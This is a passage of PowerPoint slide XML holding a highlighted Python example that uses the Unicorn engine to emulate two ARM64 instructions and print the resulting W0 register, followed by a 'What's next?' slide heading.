              <a:rPr lang="en-US" sz="1250" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1250" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B5CEA8"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>1000000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1250" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1250" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="6A9955"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t># memory address where emulation starts </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1250" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="D4D4D4"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1250" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DCDCAA"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>print</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1250" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1250" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>f</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1250" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"Emulating</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1250" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1250" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1250" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>count</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1250" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1250" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> ARM64 instructions"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1250" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1250" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C586C0"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>try</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1250" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1250" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    mu = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1250" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Uc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1250" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(UC_ARCH_ARM64, UC_MODE_ARM)     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1250" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="6A9955"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t># Initialize emulator in ARM64 (AARCH64) mode </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err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mu.mem_map</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1250" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> (ADDRESS, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1250" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B5CEA8"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1250" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> * </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1250" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B5CEA8"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>1024</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1250" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> * </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1250" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B5CEA8"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>1024</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1250" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>)     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1250" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="6A9955"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t># map 2MB memory for this emulation </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err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mu.mem_write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1250" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(ADDRESS, ARM64_CODE)     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1250" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="6A9955"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t># write machine code to be emulated to memory </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err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mu.reg_write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1250" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(UC_ARM64_REG_W1, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1250" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1250" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B5CEA8"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1250" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>)     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1250" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="6A9955"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t># initialize machine registers</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1250" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="D4D4D4"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1250" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1250" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mu.emu_start</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1250" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(ADDRESS, ADDRESS + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1250" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="DCDCAA"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>len</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1250" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(ARM64_CODE))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1250" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1250" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DCDCAA"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>print</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1250" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1250" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"Emulation done. Below is the CPU context"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1250" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1250" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    r_W0 = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1250" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mu.reg_read</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1250" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(UC_ARM64_REG_W0)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1250" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1250" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DCDCAA"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>print</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1250" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1250" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>f</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1250" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"W0 = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1250" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1250" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DCDCAA"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>hex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1250" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(r_W0)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1250" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1250" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1250" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1250" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C586C0"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>except</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1250" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1250" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>UcError</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1250" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1250" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C586C0"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>as</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1250" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> e:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1250" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1250" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DCDCAA"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>print</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1250" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1250" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"ERROR: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1250" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>%s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1250" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1250" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> % e)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91D93938-2B58-4727-8D96-6C7422CE4BBE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4126831" y="6249331"/>
            <a:ext cx="1034716" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Output</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9" descr="Interactive interpreter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5879862C-8C09-4FCF-BDC3-600FE39BD6C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5285876" y="6064665"/>
            <a:ext cx="4162926"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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Emulating 2 ARM64 instructions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Emulation done. Below is the CPU context</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>W0 = 0x6</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26642187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D1523-9CF5-4641-84EC-9FFE49E21F88}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="618641" y="1062627"/>
            <a:ext cx="6548167" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>What’s next?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{79B3CC71-AC60-4F22-8BD5-DD63E9258355}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="910387" y="1661546"/>
            <a:ext cx="10804356" cy="1357936"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
